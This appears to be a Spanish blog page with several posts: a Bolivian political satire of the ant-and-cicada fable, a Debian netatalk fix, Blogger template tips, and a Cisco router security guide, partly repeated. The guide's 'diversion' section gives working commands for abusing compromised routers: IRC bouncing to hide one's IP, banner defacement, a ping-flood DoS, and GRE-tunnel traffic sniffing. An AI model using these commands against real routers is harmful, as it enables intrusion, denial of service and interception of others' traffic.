VERSIÓN CLÁSICA
La hormiga trabaja a brazo partido todo el verano bajo
un calor aplastante. - Construye su casa y se aprovisiona
de víveres para el invierno. - La cigarra piensa que la
hormiga es tonta y se pasa el verano riendo, bailando y
jugando. - Cuando llega el invierno, la hormiga se refugia
en su casita donde tiene todo lo que le hace falta hasta la
primavera. - La cigarra, tiritando, sin comida y sin
cobijo, muere de frío.
VERSIÓN BOLIVIANA:
La hormiga trabaja a brazo partido todo el verano bajo un calor aplastante.
Construye su casa y se aprovisiona de víveres para el invierno.
La cigarra piensa que la hormiga es tonta y se pasa el verano riendo, bailando y jugando.
Cuando llega el invierno, la hormiga se refugia en su casita donde tiene todo lo que le hace falta hasta la primavera.
La cigarra, tiritando, organiza una rueda de prensa en la que se pregunta por qué la hormiga tiene derecho a vivienda
y comida, cuando hay otros, con menos suerte que ella, que tienen frío y hambre.
La televisión organiza un programa en vivo en el que la cigarra sale pasando frío y calamidades, y a la vez muestran extractos del video de la hormiga bien calientita en su casa y con la mesa llena de comida.
Todo mundo se sorprende de que en un país que cambia como el suyo dejen sufrir a la pobre cigarra mientras hay otros que viven en la abundancia.
Las asociaciones contra la pobreza, los Sin Tierra, Sin Techo, Sin Departamento, la APPO , los Alteños, los Ponchos Rojos, la Sección 22 y la Comisión de Derechos Humanos se manifiestan delante de la casa de la hormiga y la pintarrajean.
Los periodistas organizan una serie de artículos en los que cuestionan cómo la hormiga se ha enriquecido a espaldas de la cigarra.... e instan al público a opinar en sus encuestas telefónicas y on line, a través de una mañosa pregunta donde tienen qué escoger si son partidarios de la igualdad o de la discriminación. ( Como la egoísta e insensible hormiga).
Respondiendo a las encuestas de opinión, el congreso se pronuncia por una Ley sobre la igualdad económica y una Ley Anti-discriminación.
Los impuestos a la hormiga son elevados notoriamente y por si fuera poco, se le asigna una altísima multa porque no se hizo cargo de la cigarra, en el invierno.
La hormiga decepcionada, empaca y termina por irse a otro país, donde su esfuerzo sea reconocido y pueda disfrutar libremente de los frutos de su trabajo... donde no se le juzgue ni se le castigue, cuando tenga éxito.
La antigua casa de la hormiga se convierte en albergue social para cigarras que esperan a que alguien llegue a donarles el alimento y los recursos para sobrevivir dignamente.
Al gobierno se le reprocha no poner los medios necesarios.
Los partidos proponen una comisión de investigación pluripartidista, que costará 100 millones de bolivianos.
Entretanto la cigarra muere de una sobredosis de holgazanía, coca, comida y cerveza. Los medios de comunicación comentan el fracaso del gobierno para corregir las desigualdades sociales y la injusticia económica.
La casa termina siendo ocupada por una banda de arañas inmigrantes.
CUALQUIER SEMEJANZA CON ALGUNA REALIDAD EN NUESTRO PAÍS (BOLIVIA), DESDE LUEGO, ES ............ ......... ..... la pura y real verdad...
COMENTARIOS:
LO MALO DEL ENVIO DE ESTA FABULA A LA BOLIVIANA ES QUE , MUCHOS NI SIQUIERA LA LEERÁN... ESPECIALMENTE LOS POLÍTICOS... Y OTROS, NI SIQUIERA LA REFLEXIONARÀN. .. HABRÁ QUIÉNES SE IDENTIFIQUEN CON LA HORMIGA , Y OTROS CON LA CIGARRA.. .. PERO LO CIERTO ES, QUE HASTA QUE EL SISTEMA DEJE DE COBIJAR A CIGARRAS HOLGAZANAS Y A MAÑOSOS MANIFESTANTES, QUE SÓLO SE DEDICAN A CRITICAR A LOS QUE HAN LOGRADO LO QUE ELLOS NO, A HACER PLANTONES, DECIR LO QUE OTROS 'DEBEN' HACER... Y A HABLAR Y HABLAR, PERO NO A TRABAJAR.... SEGUIREMOS SIENDO EL PAÍS DE NUNCA CRECER Y NUNCA PROGRESAR.
23/3/09
Error paquete Netatalk
Recientemente hice el upgrade de Debian Lenny a Debian Squeeze, sin embargo me tropece con un pequeño problema, el paquete netatalk me daba errores al actualizarse, el error que lanzaba era el siguiente: "/var/cache/apt/archives/netatalk_2.0.4~beta2-4.1_i386.deb"
Bueno para ser sinceros ya desde la versión Lenny tenía problema con este paquete, la falta de tiempo me impidio solucionarlo, la solución es muy sencilla:
En realidad, el problema es que los archivos "/etc/default/netatalk" e "/etc/init.d/netatalk" en la línea "ATALK_NAME" está ajustado a /bin/hostname –short` cuando debería ser `/bin/hostname`. Entonces, como root, cambie esta línea en el archivo mencionado anteriormente.
Luego corri mis actualizaciones y todo funciono sin problemas
Bueno para ser sinceros ya desde la versión Lenny tenía problema con este paquete, la falta de tiempo me impidio solucionarlo, la solución es muy sencilla:
En realidad, el problema es que los archivos "/etc/default/netatalk" e "/etc/init.d/netatalk" en la línea "ATALK_NAME" está ajustado a /bin/hostname –short` cuando debería ser `/bin/hostname`. Entonces, como root, cambie esta línea en el archivo mencionado anteriormente.
Luego corri mis actualizaciones y todo funciono sin problemas
18/3/09
Edición de plantillas en Blogger : ¿Qué necesitas saber?
Básicamente se necesitan conocimientos de XHTML y CSS, además de un poco de maña para editar gráficos.
XHTML
Este es el lenguaje que se utiliza en las plantillas de Blogger para organizar el contenido, indicar qué es lo que va en cada lugar, es decir la estructura del sitio.
La página oficial de XHTML: http://www.w3.org/MarkUp/
Unos manuales más asequibles:
http://manual-xhtml.blogspot.com/
Manual XHTML de Webexperto
CSS
Este es el lenguaje con el que podemos especificar los estilos de la web, es decir, cómo se tiene que ver, qué espacio debe haber entre los elementos de nuestra página, qué fuente debe aparecer en cada lugar, el color de la fuente, del fondo, etc.
La página oficial de CSS: http://www.w3.org/Style/CSS/
Como en el caso de XHTML, este manual es muy técnico, así que aquí van otros enlaces:
http://www.sidar.org/recur/desdi/mcss/manual/indice.php
http://www.webestilo.com/css/
Lo ideal es practicar haciendo el diseño que desees para tu blog fuera de Blogger, y si lo prefieres puedes utilizar un editor visual como el DreamWeaver en windows, en Linux tenemos el Screem Editor, hacer el diseño en tu PC, con contenido ficticio, y cuando estés satisfecho, puedes intentar integrarlo en Blogger, respetando todos sus widgets.
Los widgets de Blogger son elementos dinámicos que puedes incluir en tu plantilla. Por ejemplo los elementos que hay a la derecha en esta página, son widgets de Blogger, también la parte donde aparecen los posts, es un widget de Blogger. Si te atreves, puedes empezar a analizar el código XHTML de tu plantilla de Blogger y podrás ver cómo hay widgets justo aparecen los posts, por ej.
No es fácil, pero con paciencia y haciendo muchas pruebas llegarás a conseguir lo que deseas. Sobre todo, mira como lo hacen los demás, hay mucho código ya hecho, y para verlo tan sólo tienes que hacer "Ver > Código fuente" en tu navegador.
XHTML
Este es el lenguaje que se utiliza en las plantillas de Blogger para organizar el contenido, indicar qué es lo que va en cada lugar, es decir la estructura del sitio.
La página oficial de XHTML: http://www.w3.org/MarkUp/
Unos manuales más asequibles:
http://manual-xhtml.blogspot.com/
Manual XHTML de Webexperto
CSS
Este es el lenguaje con el que podemos especificar los estilos de la web, es decir, cómo se tiene que ver, qué espacio debe haber entre los elementos de nuestra página, qué fuente debe aparecer en cada lugar, el color de la fuente, del fondo, etc.
La página oficial de CSS: http://www.w3.org/Style/CSS/
Como en el caso de XHTML, este manual es muy técnico, así que aquí van otros enlaces:
http://www.sidar.org/recur/desdi/mcss/manual/indice.php
http://www.webestilo.com/css/
Lo ideal es practicar haciendo el diseño que desees para tu blog fuera de Blogger, y si lo prefieres puedes utilizar un editor visual como el DreamWeaver en windows, en Linux tenemos el Screem Editor, hacer el diseño en tu PC, con contenido ficticio, y cuando estés satisfecho, puedes intentar integrarlo en Blogger, respetando todos sus widgets.
Los widgets de Blogger son elementos dinámicos que puedes incluir en tu plantilla. Por ejemplo los elementos que hay a la derecha en esta página, son widgets de Blogger, también la parte donde aparecen los posts, es un widget de Blogger. Si te atreves, puedes empezar a analizar el código XHTML de tu plantilla de Blogger y podrás ver cómo hay widgets justo aparecen los posts, por ej.
No es fácil, pero con paciencia y haciendo muchas pruebas llegarás a conseguir lo que deseas. Sobre todo, mira como lo hacen los demás, hay mucho código ya hecho, y para verlo tan sólo tienes que hacer "Ver > Código fuente" en tu navegador.
17/3/09
Algo para los Routers
1. Introducción.
Decidí escribir este texto porque cuando inicie a investigar sobre este tema,
no encontré ninguna guía que pudiera decir que realmente me sirvió. Todo lo
que leía era mucha teoría y cosas sacadas de manuales que no eran muy útiles.
Este texto tiene como objetivo ser una referencia básica de la seguridad en
routers CISCO sobre redes IP. Con esto quiero decir que no habrá mucha teoría
sobre lo que es un router, para que sirve, etc. y tratare de concentrarme mas
que nada en ejemplos de cosas que realmente se nos puedan presentar.
Quiero aclarar que no pretendo abarcar todo lo relacionado a la seguridad de
los routers CISCO porque seria algo tonto e imposible, como lo dije antes
esto es una "referencia básica" como para comenzar a adentrarse en el tema, aplicando lo aprendido en el curso de CCNA, libros de Cisco y experiencias propias, algunas duras.... je,je,je.
Como todo lo relacionado a la seguridad, para poder hacer a un sistema seguro
también es necesario saber como romper esa seguridad, por lo cual en algunos
casos nos pondremos en ambos puntos de vista.
Bueno, espero que esto les sea útil y ante cualquier duda, comentario o
critica no duden en escribirme.
2. Obteniendo Información.
Vamos a usar los comandos "show" para ver la información que podemos sacar del router. Dependiendo del nivel de acceso que tengamos, la versión del IOS y el modelo del router algunos comandos estarán disponibles o no:
router>show version
Información general del router, principalmente sabremos la serie del router, que versión del IOS tiene y hace cuanto tiempo que se encuentra activo.
router>show interfaces
Nos muestra las interfaces del router y como están configuradas, en redes IP tendremos acceso a cada segmento de la red a la cual alguna interfaz apunte.
router>show users
Podemos ver los usuarios que se encuentran online, pudiendo rescatar nombres de usuarios, direcciones de hosts, modems activos, etc.
router>show privilege
Nos muestra los privilegios del usuario con el cual estamos conectados, los privilegios son un valor numérico que va desde 0 a 15, donde 15 es como ser
root en un Unix.
router>show arp
Muestra las direcciones IP y las MAC Address de los hosts que se encuentran en la misma subred que alguna interfaz del router.
router>show hosts
Podemos ver los DNS que utiliza el router, los hosts y las direcciones IP a los que el router esta haciendo conexiones.
router>show terminal
Vemos la configuración de la terminal que estamos usando, si el history esta activo y los transportes para conexión soportados.
router>show history
Crea un log de todos los comandos que utilizamos. Lo podemos desactivar de esta forma:
router>terminal history size 0
router>show access-lists
Aquí tenemos todas las listas de acceso que tiene el router, esto es útil para tener una idea de como esta armada la red en razón de confianza y puntos
mas importantes.
router>show ip alias
Si el router esta en una red IP podremos ver por ejemplo las distintas direcciones IP que tienen las interfaces de ese mismo router.
router>show ip route
Nos muestra la tabla de ruteo. Sirve para darse una buena idea de la estructura de la red, a que segmentos de red esta conectado, etc.
router>show logging
Muestra los parámetros del logueo que tiene, en algunos casos los logs son enviados a algún Unix que actua como servidor syslog.
router#show configuration
(necesita enable) Muestra la configuración de todo el sistema, incluyendo los passwords encriptados y sin encriptar. Esto seria lo mismo que hacer:
router#show running-config
Teniendo privilegios mínimos pudimos acceder a valiosa información, esto es algo que se le critica a CISCO, su comando show(mostrar)muestra demasiado.
3. Algo de diversión.
Ahora veremos como acceder al IRC usando un router como bouncer (bnc, un bouncer es un programa que se ejecuta en una shell y el cual nos sirve para hacer de enlace o puente entre nosotros y el servidor de irc o ftp que querramos usar usando la ip del servidor donde se encuentra este bouncer) para esconder
nuestra IP. Primero abrimos nuestro cliente de IRC preferido, y luego en la
linea de comandos escribimos lo siguiente:
/server router_IP 23
/quote router_password
/quote ( escribimos el servidor IRC, al que nos conectamos) 6667
/quote user ca0s
/quote nick ca0s
Lo que hacemos es conectarnos al router desde nuestro cliente de chat y desde
allí al servidor de IRC. Seria lo mismo que hacer un telnet desde el router al IRC pero sin necesidad de tener el RFC a mano.
Vamos a hacer lo que seria un "defacement" pero aplicado a los routers CISCO. Osea, vamos a cambiarle el banner de entrada al
router:
router#configure terminal
router(config)#banner login x
Owned by Alvarus
***PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**
Usted ha accedido a un equipo privado. El uso de este dispositivo sin autorización o para propósitos para los cuales ninguna autorización ha sido otorgada constituye una violación de las leyes y sera punible con multas o prisión o peor aún puesto en manos de los ponchos rojos :).
***PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**
x
router(config)#exit
La letra "x" es la que en este ejemplo marca el final de texto, así que tengan
en cuenta no escribir ninguna palabra con la letra que elijan.
Si con esto no les alcanza, también pueden cambiar el prompt del router de esta forma:
router#configure terminal
router(config)#prompt Alvarus%p
router(config)#exit
Alvarus#
Al ponerle el "%p" al final le indicamos que mantenga la ">" y el "#" para
indicarnos los distintos niveles de acceso, de lo contrario solo nos aparece
la palabra que elegimos y se hace medio confuso. Si quieren dejar el prompt
como viene por default hacen "no prompt PALABRA".
Algo por demás útil para esos molestos del IRC es usar el router para realizar
un PING flood, imagínense que estos aparatos manejan un buen ancho de banda,
por lo que este tipo de DoS puede volverse muy efectivo:
routers#ping
Protocol[IP]: (ENTER)
Target IP address: 200.87.100.10
Repeat count [5]: 500000
Datagram size [100]: 20000
Time out in seconds [2]: 0
Extended commands [n]: (ENTER)
Sweep range of sizes [n]: (ENTER)
Después de poner "ping", en la primera linea presionamos ENTER, en la segunda
linea ponemos la dirección IP de la víctima, en la tercera linea la cantidad
de veces que queremos que se envié el paquete, en la cuarta linea el tamaño
del paquete, en la quinta linea los segundos que debe esperar y en las
siguientes dos lineas presionamos ENTER.
Para finalizar esta sección me gustaría explicar brevemente algo muy útil como
lo es sniffear un router.
La teoría es mas que simple, lo que haríamos seria re-rutear el trafico del
router enviándolo a nuestro box, sniffear los paquetes que llegan y volver a
enviar ese trafico desde nuestro box al router para que este los dirija a su
destino real.
Esta técnica fue originalmente descripta por gaius del HERT en la Phrack 56;
junto con su excelente articulo venia el tunnelx.c que es el soft que nos
permitirá redireccionar el trafico del tunel a una interfaz existente, pero
nosotros vamos a utilizar el funnel.c hecho por jimjones de [lowlevel] ya que tuve mejores resultados con este.
Como dije al principio la teoría es mas que simple, y el llevarlo a la practica
también lo es, así que sigamos este caso hipotético:
root@foo#telnet 192.168.1.200 (IP del router)
router>enable
router#configure terminal
router(config)#int tunnel0
router(config-if)#ip address 192.168.0.1 255.255.255.0
router(config-if)#tunnel mode gre ip
router(config-if)#tunnel source Ethernet0/0/0
router(config-if)#tunnel destination 192.168.1.20
router(config-if)#exit
router(config)#exit
router#disable
router>
Con esto ya re-ruteamos todo el trafico a nuestro box en la IP 192.168.1.20
Cuando digo "nuestro" box, no me refiero a "nuestro" box, sino a algún box
owneado que tengamos por allí.
A partir de aquí compilamos y corremos el funnel, y con cualquier sniffer
como el dsniff capturamos los paquetes que nos llegan. Luego simplemente
levantamos un tunel hacia el router desde nuestro box y le redireccionamos
los paquetes.
Si tienen problemas para compilar el funnel.c lo mas probable es que les
falte alguna libreria. El funnel.c se lo pueden bajar de www.low-level.net.
4. Defendiendo nuestro CISCO.
Los siguientes son los conceptos básicos que deberemos tener en cuenta si
vamos a administrar la seguridad de un router CISCO. Tengan en cuenta que
esto solo es "lo básico", y en la mayoría de los casos todo dependerá del
router que estén usando y de las necesidades de la red.
A. Usuarios y privilegios.
Los privilegios de acceso van desde 0 hasta 15, siendo 1 lo usual para un
usuario normal(cuando nos logueamos al router) y 15 el default para el usuario
privilegiado.
router>show privilege
Current privilege level is 1
router>enable
Password:
router#show privilege
Current privilege level is 15
router#disable
router>show privilege
Current privilege level is 1
Podemos proteger la contraseña del usuario privilegiado(llamemoslo enable)
mediante dos tipos de encriptación, una con un algoritmo de encriptacion
trivial de CISCO conocido como de tipo 7, y otra con MD5 que es un algoritmo
muy fuerte conocido como de tipo 5.
Para encriptar el password de enable con el algoritomo trivial de CISCO
simplemente hacemos un "enable password", y a continuación bajamos el
ciscocrack.c de PacketStorm para crackearlo, ahora si deseamos utilizar un
algoritmo de encriptación en serio hacemos lo siguiente:
router#configure terminal
router(config)#enable secret NEWPASS
router#exit
router#copy running-config startup-config
Vemos que entramos en modo de configuración, cambiamos el password, salimos
del modo de configuración y guardamos los cambios copiando la configuración
al startup.
Ahora vamos a cambiar la contraseña para todos aquellos que ingresen mediante
telnet con privilegio de ejecución normal. Como vemos lo estamos haciendo para
las terminales virtuales desde la 0 hasta la 5:
router#configure terminal
router(config)#no enable secret
router(config)#line vty 0 4
router(config)#password NEWPASS
router(config)#exit
Si somos muy paranoicos directamente podemos desactivar el acceso al router
mediante telnet de esta forma:
router#configure terminal
router(config)#no enable secret
router(config)#line vty 0 4
router(config)#transport input none
router(config)#exit
router#
Por default cuando nos conectamos a la consola o al puerto auxiliar tenemos
privilegios de ejecución de usuario(nivel 1 por default) sin password. De la
siguiente forma lo configuramos para que nos pida password:
router#configure terminal
router(config)#line console 0
router(config)#login
router(config)#password PASS
router(config)#exec-timeout 1 30
router(config)#line aux 0
router(config)#login
router(config)#password PASS
router(config)#exit
router#
Como habíamos visto al principio con los comandos "show", el IOS permite el
uso de ciertos comandos con privilegios mínimos que no debería permitir; es
mas, al listar los comandos disponibles con "comando ?" solo aparecen algunos,
pero si ejecutamos otros que sabemos que se encuentran estando en modo enable
los podremos utilizar sin ninguna restricción.
Una solución para prevenir que personas sin los suficientes privilegios puedan
tocar o mirar cosas que no deben en nuestro router, es asignarle al usuario
normal privilegios de 0 en vez de 1. Al hacer esto le estamos restringiendo
el uso de todos los comandos y manualmente debemos especificar que comandos
puede utilizar.
También es valido el proceso contrario, directamente especificamos que solo
podrán ejecutar ciertos comandos los que tengan un determinado nivel de
privilegios.
router#privilege exec level 7 show
router#enable password level 7 PASS
En este ejemplo lo que decimos es que para poder utilizar el comando show
debemos poseer un nivel de privilegio 7, y luego seteamos un password para
ese nivel.
B. Listas de acceso.
Tenemos dos tipos de listas de acceso, las estándares y las extendidas.
Las estándares tienen una sola dirección de correspondencia, mientras que
las extendidas tienen dos direcciones con información opcional del tipo de
protocolo.
- Listas de acceso estándares:
access-list lista [permit|deny] IP mascara
"lista" es un valor numérico que va desde 1 hasta 99. "permit" y "deny"
corresponden a permitir y denegar en las reglas. Los valores de "IP" y
"mascara" son de 32 bits y se escriben en notación decimal punteada, pero
no debe confundirse esta "mascara" con la mascara de subred que subdivide
un numero de asignación de red IP.
Veamos estos ejemplos:
access-list 1 permit 200.51.210.0 0.0.0.255
access-list 1 permit 200.45.0.0 0.0.255.255
Aqui especificamos dos valores de IP y mascara, ambos se aplican al numero
1 de la lista de acceso. El primer comando de la lista permite el acceso a
toda la clase C de 200.51.210.0 y el segundo permite acceso a toda la clase
B de 200.45.0.0.
Si no se especifica valor de mascara se entenderá que es todo 0.0.0.0; por
lo que lo siguiente tendría el mismo efecto:
access-list 2 permit 200.45.184.3 0.0.0.0
access-list 2 permit 200.45.184.3
en este caso solo se permite el trafico de la IP 200.45.184.3.
Ahora, para terminar de redondear el tema sobre este tipo de listas, veamos
el siguiente ejemplo:
access-list 3 permit 24.232.144.11 0.0.0.0
access-list 3 deny 24.232.0.0 0.0.255.255
access-list 3 permit 24.0.0.0 0.255.255.255
Lo que decimos aquí es que se permita el trafico a toda la clase A 24.0.0.0,
pero dentro de esta red se le deniegue a la clase B 24.232.0.0, exceptuando
a la IP 24.232.144.11 que si tiene permitido el trafico.
- Listas de acceso extendidas:
Las listas de acceso extendidas nos permiten filtrar el trafico de una
interfaz en base a direcciones IP fuente y destino, además de la información
del protocolo.
access-list lista [permit|deny] prot IP_in masc_in IP_out masc_out oper
"lista" es un valor numérico que ira desde de 100 hasta 199, y sirve para
identificar a las distintas reglas. "permit" y "deny" corresponden a permitir
y denegar en las reglas. "prot" es el protocolo que usaremos, que puede ser
IP, TCP, UDP e ICMP, pero como el IP encapsula los paquetes TCP, UDP e ICMP
puede utilizarse para igualar a cualquiera de ellos. "IP_in" y "masc_in" nos
indicaran la IP origen. "IP_out" y "masc_out" nos indicaran la IP destino;
recuerden que aquí la mascara no tiene nada que ver con la mascara de subred
en redes IP. Con "oper"(operador y operando) se puede comparar los números
de puerto, puntos de acceso o nombres de contacto; estos valores son validos
para TCP y UDP, siendo los operadores posibles it(menor que), eq(igual que),
gt(mayor que) y neq(diferente que).
A los ejemplos:
access-list 101 deny tcp 24.232.1.1 0.0.0.0 200.47.180.0 0.0.0.255 eq 23
Aqui simplemente estamos diciendo que la IP 24.232.1.1, no puede hacer ninguna
conexion TCP al puerto 23 de la red clase C 200.47.180.0.
Veamos otro:
access-list 101 permit tcp 0.0.0.0 255.255.255.255 200.30.0.0 0.0.255.255 gt 1023
access-list 101 permit tcp 0.0.0.0 255.255.255.255 200.30.10.1 0.0.0.0 eq 25
access-list 101 permit icmp 0.0.0.0 255.255.255.255 200.30.0.0 255.255.255.255
interface ethernet 0
ip access-group 101
El primer comando de la lista, permite cualquier conexión TCP entrante con
puertos destinatarios mayores a 1023. El segundo comando de la lista admite
conexiones de cualquier lugar al puerto 25 de la IP 200.30.10.1. El ultimo
comando permite los mensajes ICMP entrantes para la retroalimentación de error.
Hay que tener en cuenta que en las listas de acceso extendidas, una vez que
terminamos de definirlas se las tenemos que aplicar a una interfaz en concreto,
por supuesto aplicándole un numero de lista como en las dos ultimas lineas
del ejemplo anterior:
interface ethernet 0
ip access-group 101
Veamos un ultimo ejemplo esperando que mi cabeza pueda seguir un poco mas.
Supongamos lo siguiente, somos los administradores de la red 200.47.0.0 que se
encuentra conectada a Internet. Y queremos que desde esta red hacia Internet
se pueda establecer cualquier conexión TCP, pero no queremos lo contrario,
salvo por la maquina 200.47.10.8 en la que tenemos un webserver y en este caso
si permitiremos conexiones desde Internet a esa IP pero solo en el puerto 80.
access-lists 102 permit tcp 0.0.0.0 255.255.255.255 200.47.0.0 0.0.255.255 established
access-lists 102 permit tcp 0.0.0.0 255.255.255.255 200.47.10.8 0.0.0.0 eq 80
interface ethernet 0
ip access-group 102
Como vemos la palabra "established" es la clave aquí, puesto que puede indicar
una conexión establecida en el protocolo TCP.
Por ultimo, cualquier error que hayamos cometido al hacer las listas de acceso
tanto estándares como extendidas, lo podemos subsanar eliminando la lista
de esta forma:
no access-list lista
donde "lista" es el numero que le pusimos a la regla.
C. Editar ACLs en Cisco
Muchas de las veces que tenemos que editar una ACL para insertar una IP o borrar otra lo que hacemos es borrar la ACL por completo y metemos la ACL completa rectificada de nuevo, pero podemos hacerlo mucho más simple insertando y borrando reglas de una en una.
El método clásico sería copiar la ACL, borrarla y volver a crearla modificada (el primer paso es crear el ACL aunque se supone que ya está creada):
1.Creamos la ACL:
router#configure terminal
router(config)#access-list 121 deny icmp any any
router(config)#access-list 121 permit ip any any
2.Mostramos la ACL para copiarla en un editor y modificarla:
router#show access-list
Extended IP access list 121
deny icmp any any
permit ip any any
3.Borramos la ACL:
router#configure terminal
router(config)#no access-list 101 deny icmp any any
NOTA: Si intentamos borrar una SOLA línea también borrará la ACL por completo.
4.Comprobamos que la ACL está borrada :
router#show access-list
router#
Si intentamos añadir una línea lo hará al final que seguramente no sea lo que queramos especialmente si poner al final algún tipo de DENY, los líneas añadidas estarán por debajo del DENY y por lo tanto serán ignoradas.
Para insertar podemos hacer lo siguiente:
1.Listar la ACL (los números son importantes):
router#show access-list 121
Extended IP access list 121
10 deny icmp any any
20 permit ip any any
2.Para insertar lo que tenemos que hacer es entrar en la ACL y luego usar los números para insertar en la posición correcta:
router#configure terminal
router(config)#ip access-list extended 121
router(config-ext-nacl)#6 permit icmp 10.0.0.0 0.0.0.255 any
3.Si mostramos ahora la ACL veremos que hemos insertado una línea donde hemos indicado:
router#show access-list 121
Extended IP access list 121
6 permit icmp 10.0.0.0 0.0.0.255 any
10 deny icmp any any
20 permit ip any any
Lo mismo para borrar una línea concreta que se puede hacer de dos formas:
1.Listar la ACL (los números también son son importantes):
router#show access-list 121
Extended IP access list 121
10 deny icmp any any
20 permit ip any any
2.Primero entramos en la ACL (al igual que antes:
router#configure terminal
router(config)#ip access-list extended 121
3.Y ahora podemos borrar de 2 formas:
Usando el número de la línea:
router#no 1
Negango la línea completa:
router#no deny icmp any any
4.Si mostramos ahora la ACL veremos que hemos insertado una línea donde hemos indicado:
router#show access-list 121
Extended IP access list 121
6 permit icmp 10.0.0.0 0.0.0.255 any
20 permit ip any any
Para una completa compresión de las ACL podemos ir a la web de Cisco que explica detalladamente las ACLs:
D. Deshabilitando servicios.
Generalmente la mayoría de los routers CISCO vienen corriendo con muchos
servicios por default que jamas vamos a utilizar. Los siguientes son algunos
servicios que deberíamos considerar desactivar:
no service udp-small-servers
no service tcp-small-servers
no service finger
no ip bootp server
no ip http server
no service pad
no ntp enable
Algunos de los siguientes servicios deberemos indicarle la interfaz donde
vamos a desactivar el servicio, tengan en cuenta de hacerlo en todas si es
necesario:
interface Ethernet0
no cdp enable
!para desactivar el protocolo CDP
no cdp run
!lo mismo que lo anterior pero de manera global
no ip unreachables
!para evitar que sepan que usamos listas de acceso
interface Ethernet1
no ip proxy-arp
!si no necesitamos el servicio de proxy ARP
interface Ethernet1
no ip redirects
!si no necesitamos enviar redireccionamientos
interface Ethernet0
no ip directed-broadcast
!para evitar ataques del tipo smurf
5. Despedida.
Como vimos los routers CISCO son como cualquier otro sistema que conocemos,
no podemos dejarlo funcionando con una "instalación por default", y gracias
a la inoperancia de CISCO en algunos aspectos esto se complica mucho mas.
Bueno, espero que esta mini-guia con los conceptos básicos de la seguridad
en estos routers les haya sido útil. Si son administradores espero que
puedan dormir con una falsa sensación de seguridad y si no lo son estoy
seguro que se van a divertir mucho.
Disculpen cualquier gran error que haya cometido, y cualquier comentario o
critica sera bien recibida. Si me llega algun feedback de quienes les haya
servido esto posiblemente lo vuelva a editar con mas cosas.
Decidí escribir este texto porque cuando inicie a investigar sobre este tema,
no encontré ninguna guía que pudiera decir que realmente me sirvió. Todo lo
que leía era mucha teoría y cosas sacadas de manuales que no eran muy útiles.
Este texto tiene como objetivo ser una referencia básica de la seguridad en
routers CISCO sobre redes IP. Con esto quiero decir que no habrá mucha teoría
sobre lo que es un router, para que sirve, etc. y tratare de concentrarme mas
que nada en ejemplos de cosas que realmente se nos puedan presentar.
Quiero aclarar que no pretendo abarcar todo lo relacionado a la seguridad de
los routers CISCO porque seria algo tonto e imposible, como lo dije antes
esto es una "referencia básica" como para comenzar a adentrarse en el tema, aplicando lo aprendido en el curso de CCNA, libros de Cisco y experiencias propias, algunas duras.... je,je,je.
Como todo lo relacionado a la seguridad, para poder hacer a un sistema seguro
también es necesario saber como romper esa seguridad, por lo cual en algunos
casos nos pondremos en ambos puntos de vista.
Bueno, espero que esto les sea útil y ante cualquier duda, comentario o
critica no duden en escribirme.
2. Obteniendo Información.
Vamos a usar los comandos "show" para ver la información que podemos sacar del router. Dependiendo del nivel de acceso que tengamos, la versión del IOS y el modelo del router algunos comandos estarán disponibles o no:
router>show version
Información general del router, principalmente sabremos la serie del router, que versión del IOS tiene y hace cuanto tiempo que se encuentra activo.
router>show interfaces
Nos muestra las interfaces del router y como están configuradas, en redes IP tendremos acceso a cada segmento de la red a la cual alguna interfaz apunte.
router>show users
Podemos ver los usuarios que se encuentran online, pudiendo rescatar nombres de usuarios, direcciones de hosts, modems activos, etc.
router>show privilege
Nos muestra los privilegios del usuario con el cual estamos conectados, los privilegios son un valor numérico que va desde 0 a 15, donde 15 es como ser
root en un Unix.
router>show arp
Muestra las direcciones IP y las MAC Address de los hosts que se encuentran en la misma subred que alguna interfaz del router.
router>show hosts
Podemos ver los DNS que utiliza el router, los hosts y las direcciones IP a los que el router esta haciendo conexiones.
router>show terminal
Vemos la configuración de la terminal que estamos usando, si el history esta activo y los transportes para conexión soportados.
router>show history
Crea un log de todos los comandos que utilizamos. Lo podemos desactivar de esta forma:
router>terminal history size 0
router>show access-lists
Aquí tenemos todas las listas de acceso que tiene el router, esto es útil para tener una idea de como esta armada la red en razón de confianza y puntos
mas importantes.
router>show ip alias
Si el router esta en una red IP podremos ver por ejemplo las distintas direcciones IP que tienen las interfaces de ese mismo router.
router>show ip route
Nos muestra la tabla de ruteo. Sirve para darse una buena idea de la estructura de la red, a que segmentos de red esta conectado, etc.
router>show logging
Muestra los parámetros del logueo que tiene, en algunos casos los logs son enviados a algún Unix que actua como servidor syslog.
router#show configuration
(necesita enable) Muestra la configuración de todo el sistema, incluyendo los passwords encriptados y sin encriptar. Esto seria lo mismo que hacer:
router#show running-config
Teniendo privilegios mínimos pudimos acceder a valiosa información, esto es algo que se le critica a CISCO, su comando show(mostrar)muestra demasiado.
3. Algo de diversión.
Ahora veremos como acceder al IRC usando un router como bouncer (bnc, un bouncer es un programa que se ejecuta en una shell y el cual nos sirve para hacer de enlace o puente entre nosotros y el servidor de irc o ftp que querramos usar usando la ip del servidor donde se encuentra este bouncer) para esconder
nuestra IP. Primero abrimos nuestro cliente de IRC preferido, y luego en la
linea de comandos escribimos lo siguiente:
/server router_IP 23
/quote router_password
/quote ( escribimos el servidor IRC, al que nos conectamos) 6667
/quote user ca0s
/quote nick ca0s
Lo que hacemos es conectarnos al router desde nuestro cliente de chat y desde
allí al servidor de IRC. Seria lo mismo que hacer un telnet desde el router al IRC pero sin necesidad de tener el RFC a mano.
Vamos a hacer lo que seria un "defacement" pero aplicado a los routers CISCO. Osea, vamos a cambiarle el banner de entrada al
router:
router#configure terminal
router(config)#banner login x
Owned by Alvarus
***PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**
Usted ha accedido a un equipo privado. El uso de este dispositivo sin autorización o para propósitos para los cuales ninguna autorización ha sido otorgada constituye una violación de las leyes y sera punible con multas o prisión o peor aún puesto en manos de los ponchos rojos :).
***PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**PELIGRO**
x
router(config)#exit
La letra "x" es la que en este ejemplo marca el final de texto, así que tengan
en cuenta no escribir ninguna palabra con la letra que elijan.
Si con esto no les alcanza, también pueden cambiar el prompt del router de esta forma:
router#configure terminal
router(config)#prompt Alvarus%p
router(config)#exit
Alvarus#
Al ponerle el "%p" al final le indicamos que mantenga la ">" y el "#" para
